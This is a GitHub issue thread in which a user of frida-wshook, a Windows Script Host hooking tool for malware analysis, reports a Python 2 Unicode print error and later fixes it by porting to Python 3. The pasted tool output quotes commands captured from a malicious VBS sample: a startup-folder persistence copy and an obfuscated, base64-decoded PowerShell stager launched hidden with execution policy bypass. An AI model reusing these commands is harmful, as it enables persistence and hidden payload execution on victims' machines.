### ISSUE TITLE
Unicode treatment in cmd / powershell window on Windows 10 x64 [Not an issue ?]

### ISSUE THREAD

**Issue by chirrindul** [frida/frida#2011]
Maybe this is not an issue and someone could instruct me how to launch python to solve this problem. 
I'm using https://github.com/OALabs/frida-wshook which uses this project (frida). 
If I launch frida-wshook under a CMD or POWERSHELL window on windows 10 x64, there is an error related to the unicode response of a powershell command. But, if I launch frida-wshook under a Viaual Studio Code debug session, I can see the output. How can I resolve that?

Output form POWERSHELL / CMD that differs form the Visual Studio Code one: 

```
Traceback (most recent call last): 
  File "C:\python27-x64\lib\site-packages\frida\core.py", line 450, in _on_message
    callback(message, data)
  File ".\frida-wshook.py", line 83, in on_message
    print "  |-Params: %s" % hmsg['params']
  File "C:\python27-x64\lib\encodings\cp437.py", line 12, in encode
    return codecs.charmap_encode(input,errors,encoding_map)
UnicodeEncodeError: 'charmap' codec can't encode characters in position 36-37: character maps to <undefined>

```

Complete output form Visual Studio Code:
```
>  c:; cd 'c:\MALWARE\frida-wshook'; & 'c:\python27-x64\python.exe' 'c:\Users\malwan\.vscode\extensions\ms-python.python-2021.10.1365161279\pythonFiles\lib\python\debugpy\launcher' '53194' '--' 'c:\MALWARE\frida-wshook\frida-wshook.py' '--debug' 'C:\MALWARE\file.vbs' 
 [*] x64 detected..using SysWOW64
 [*] Setting Script Vars...
Setting Script Vars...
 - DEBUG_FLAG: true
 - DISABLE_DNS: false
 - ALLOW_SHELL: false
 - DISABLE_WSASEND: false
 - DISABLE_COM_INIT: false
 [*] Hooking Process 8112
 Press ctrl-c to kill the process...
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.

 CLSIDFromProgID Called
  |-ProgId: WScript.Shell

 CLSIDFromProgID Called
  |-ProgId: Wscript.Shell

 ShellExecute Called
  |-nShow: SW_HIDE
  |-Command: cmd.exe
  |-Params: /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\MALWARE\frida-wshook\file.vbs','C:\Users\' +  [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ YSM.vbs')

 [!] Error: {u'type': u'error', u'description': u'Error: expected an integer'}
 CLSIDFromProgID Called
  |-ProgId: WScript.Shell

 ShellExecute Called
  |-nShow: SW_HIDE
  |-Command: powershell
  |-Params: -command $Codigo = 'WwBCΓüéΓ¥ªH...SNIP...KQΓüéΓ¥ª=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('ΓüéΓ¥ª','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD

 [!] Error: {u'type': u'error', u'description': u'Error: expected an integer'}
 [!] Warning: Instrumentation script has been destroyed!
 [!] CScript process has terminated!
Traceback (most recent call last):
  File "c:\MALWARE\frida-wshook\frida-wshook.py", line 52, in on_detach
    print '     |- Process Id: %s' % message.pid
AttributeError: 'unicode' object has no attribute 'pid'
```

**Comment by chirrindul** [comment]
Porting wshook.py to python3 (only adding semicollons to print calls) solves the problem.
